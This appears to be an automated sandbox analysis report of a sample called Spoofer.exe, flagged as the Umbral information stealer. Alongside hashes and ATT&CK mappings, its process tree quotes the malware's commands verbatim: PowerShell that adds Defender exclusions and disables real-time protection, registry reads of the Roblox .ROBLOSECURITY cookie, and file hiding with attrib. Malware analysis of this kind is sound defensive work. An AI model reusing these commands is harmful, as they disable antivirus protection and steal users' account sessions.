umbral | 36c0e34d73f51cda52a92a638cf821847fd3c8efd87350eeb874dbc8a94c1927

General

Target

Spoofer.exe
Size

254KB
MD5

f472ad2223ee5bc9619f36e2547ef3a6
SHA1

da1d05ba368c36a18920f466cb83f665f7afc440
SHA256

36c0e34d73f51cda52a92a638cf821847fd3c8efd87350eeb874dbc8a94c1927
SHA512

a1ed5b049867ffd019f10a8d4b5ffc7bda6fcbfd9f2c5850ce620d848a18d2ac64ec36f39b9469759c7c1f3ff40331829af59c645d7be7d2834586b854c92a67
SSDEEP

6144:K4oZoAeVHPtHgTIAaZgCwDx7axHU0unC28ejI8d7:xoZyHPvWCwjXCsIQ

Score

10^/10

umbral execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4488-1-0x0000024DCE040000-0x0000024DCE086000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2928 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

Spoofer.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts Spoofer.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

10 discord.com
11 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

5104 wmic.exe

pid	process
2928	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Spoofer.exe

flow	ioc
10	discord.com
11	discord.com

flow	ioc
3	ip-api.com

pid	process
5104	wmic.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

Spoofer.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4488	Spoofer.exe
2928	powershell.exe
2928	powershell.exe
2928	powershell.exe
3688	powershell.exe
3688	powershell.exe
3688	powershell.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe
2608	powershell.exe
2608	powershell.exe
2608	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Spoofer.exewmic.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4488	Spoofer.exe
Token: SeIncreaseQuotaPrivilege	304	wmic.exe
Token: SeSecurityPrivilege	304	wmic.exe
Token: SeTakeOwnershipPrivilege	304	wmic.exe
Token: SeLoadDriverPrivilege	304	wmic.exe
Token: SeSystemProfilePrivilege	304	wmic.exe
Token: SeSystemtimePrivilege	304	wmic.exe
Token: SeProfSingleProcessPrivilege	304	wmic.exe
Token: SeIncBasePriorityPrivilege	304	wmic.exe
Token: SeCreatePagefilePrivilege	304	wmic.exe
Token: SeBackupPrivilege	304	wmic.exe
Token: SeRestorePrivilege	304	wmic.exe
Token: SeShutdownPrivilege	304	wmic.exe
Token: SeDebugPrivilege	304	wmic.exe
Token: SeSystemEnvironmentPrivilege	304	wmic.exe
Token: SeRemoteShutdownPrivilege	304	wmic.exe
Token: SeUndockPrivilege	304	wmic.exe
Token: SeManageVolumePrivilege	304	wmic.exe
Token: 33	304	wmic.exe
Token: 34	304	wmic.exe
Token: 35	304	wmic.exe
Token: 36	304	wmic.exe
Token: SeIncreaseQuotaPrivilege	304	wmic.exe
Token: SeSecurityPrivilege	304	wmic.exe
Token: SeTakeOwnershipPrivilege	304	wmic.exe
Token: SeLoadDriverPrivilege	304	wmic.exe
Token: SeSystemProfilePrivilege	304	wmic.exe
Token: SeSystemtimePrivilege	304	wmic.exe
Token: SeProfSingleProcessPrivilege	304	wmic.exe
Token: SeIncBasePriorityPrivilege	304	wmic.exe
Token: SeCreatePagefilePrivilege	304	wmic.exe
Token: SeBackupPrivilege	304	wmic.exe
Token: SeRestorePrivilege	304	wmic.exe
Token: SeShutdownPrivilege	304	wmic.exe
Token: SeDebugPrivilege	304	wmic.exe
Token: SeSystemEnvironmentPrivilege	304	wmic.exe
Token: SeRemoteShutdownPrivilege	304	wmic.exe
Token: SeUndockPrivilege	304	wmic.exe
Token: SeManageVolumePrivilege	304	wmic.exe
Token: 33	304	wmic.exe
Token: 34	304	wmic.exe
Token: 35	304	wmic.exe
Token: 36	304	wmic.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeIncreaseQuotaPrivilege	2928	powershell.exe
Token: SeSecurityPrivilege	2928	powershell.exe
Token: SeTakeOwnershipPrivilege	2928	powershell.exe
Token: SeLoadDriverPrivilege	2928	powershell.exe
Token: SeSystemProfilePrivilege	2928	powershell.exe
Token: SeSystemtimePrivilege	2928	powershell.exe
Token: SeProfSingleProcessPrivilege	2928	powershell.exe
Token: SeIncBasePriorityPrivilege	2928	powershell.exe
Token: SeCreatePagefilePrivilege	2928	powershell.exe
Token: SeBackupPrivilege	2928	powershell.exe
Token: SeRestorePrivilege	2928	powershell.exe
Token: SeShutdownPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeSystemEnvironmentPrivilege	2928	powershell.exe
Token: SeRemoteShutdownPrivilege	2928	powershell.exe
Token: SeUndockPrivilege	2928	powershell.exe
Token: SeManageVolumePrivilege	2928	powershell.exe
Token: 33	2928	powershell.exe
Token: 34	2928	powershell.exe
Token: 35	2928	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

Spoofer.exe

description	pid	process	target process
PID 4488 wrote to memory of 304	4488	Spoofer.exe	wmic.exe
PID 4488 wrote to memory of 304	4488	Spoofer.exe	wmic.exe
PID 4488 wrote to memory of 4244	4488	Spoofer.exe	attrib.exe
PID 4488 wrote to memory of 4244	4488	Spoofer.exe	attrib.exe
PID 4488 wrote to memory of 2928	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 2928	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 3688	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 3688	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 4964	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 4964	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 2608	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 2608	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 4756	4488	Spoofer.exe	wmic.exe
PID 4488 wrote to memory of 4756	4488	Spoofer.exe	wmic.exe
PID 4488 wrote to memory of 4204	4488	Spoofer.exe	wmic.exe
PID 4488 wrote to memory of 4204	4488	Spoofer.exe	wmic.exe
PID 4488 wrote to memory of 3036	4488	Spoofer.exe	wmic.exe
PID 4488 wrote to memory of 3036	4488	Spoofer.exe	wmic.exe
PID 4488 wrote to memory of 3928	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 3928	4488	Spoofer.exe	powershell.exe
PID 4488 wrote to memory of 5104	4488	Spoofer.exe	wmic.exe
PID 4488 wrote to memory of 5104	4488	Spoofer.exe	wmic.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4244 attrib.exe

pid	process
4244	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Spoofer.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4488

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:304

C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Spoofer.exe"
2⤵
- Views/modifies file attributes
PID:4244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Spoofer.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2608

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
2⤵
PID:4756

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
2⤵
PID:4204

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
2⤵
PID:3036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3928

C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
2⤵
- Detects videocard installed
PID:5104

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1b5df20804d1c95783d32c750689c49f

SHA1
1d2fd1fea30d7fc09d00d57705c5b70fd470f51b

SHA256
bd865fb0ee59a16d8df985a43dbc179dc98a6514b28a6697c2e81bb4170b2804

SHA512
48f0148e19bb89a415fbe82efac9c6bd892e8d544b8886db6d8d296d79a67057a8262948b86496a53fbfc51f9e7ade329b9dbfcd602829a59549dd56a20ffca6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c0278d3b47cf401aba9f3c11c02c1818

SHA1
91d2a4dea01a786ab4bddaf1cd0927b8bece1747

SHA256
fb85bf5e9c75ceb6cc9806d95109b22b9bf41cd92c3452f8f0742b9f6ad89a3b

SHA512
1f5aab4515faf3ed480ab77fe8113748fee65c361731c6bb4f730c8de108bedabf72fe3d14934d23030aafe87f21397633e3e255959f317731899ff683b66b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3c50d929cf3a1a057f9b2862cd20df1

SHA1
c8067ee54d074bed6ede382933bad73981a17ce0

SHA256
178f684f57a5dfb637293bbecfa86c6b7e122227610d10b56ccd0681d3d1d4a4

SHA512
1b9575efa748dc95441d5212957b0edbad2dc4657214f0aef8cb8f48bb4da4b2079d318cf235ae75bb1446e15af54fa8550bf79a7d3c79a67c4f37b8a608ba5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e89a38aa646eefea123dea9fcc792c03

SHA1
6324edb14b2844618f66d8c6327cfa017c796c7d

SHA256
573a66b7d1264cb0149fbfdc4b3e8e9fc73dbdca915281694a01c099bacec7d7

SHA512
c42bd2d7d07c31b693e6e467985da05248e4bc6797fecbfe9696edefb85e4ad9d672c67e2ec5f8163ee5029c9cca32db47e38d79c15326addf48141bd75ff0b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmd22u4g.3cw.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/2928-8-0x00000254A17D0000-0x00000254A17F2000-memory.dmp

Filesize
136KB

Download
memory/2928-11-0x00000254A1980000-0x00000254A19F6000-memory.dmp

Filesize
472KB

Download
memory/4488-3-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

Filesize
9.9MB

Download
memory/4488-0-0x00007FF8C0603000-0x00007FF8C0604000-memory.dmp

Filesize
4KB

Download
memory/4488-80-0x0000024DE87B0000-0x0000024DE8800000-memory.dmp

Filesize
320KB

Download
memory/4488-81-0x0000024DE8820000-0x0000024DE883E000-memory.dmp

Filesize
120KB

Download
memory/4488-2-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

Filesize
9.9MB

Download
memory/4488-146-0x0000024DE86B0000-0x0000024DE86BA000-memory.dmp

Filesize
40KB

Download
memory/4488-147-0x0000024DE86E0000-0x0000024DE86F2000-memory.dmp

Filesize
72KB

Download
memory/4488-1-0x0000024DCE040000-0x0000024DCE086000-memory.dmp

Filesize
280KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads